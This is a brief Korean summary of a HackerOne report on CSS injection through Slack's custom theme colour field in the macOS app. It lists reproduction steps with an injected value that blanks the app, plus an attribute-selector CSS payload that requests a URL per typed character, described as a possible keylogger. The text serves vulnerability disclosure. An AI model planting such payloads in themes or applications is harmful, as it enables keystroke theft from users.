• 대상 : Slack
• 취약점 : Improper Input Validation, css injection
• 위험도 : Medium (4.3)
• 바운티 : 500$
• 링크 : https://hackerone.com/reports/679969

Slack Mac OS v4.0.2에서 테스팅 하였습니다.

1. 설정 -> 테마 -> 사이드 바
2. 커스텀 테마 설정
3. column BG 를 #FFFFFF;} html {display:none;} 로 변경
4. 앱이 터짐

input[type="text"][value$="a"] {
  background-image: url("http://localhost:3000/a");
}

커스텀 테마 형식으로 배포된다면 해당 코드가 삽입되어 키로거로 활용될 수 있음.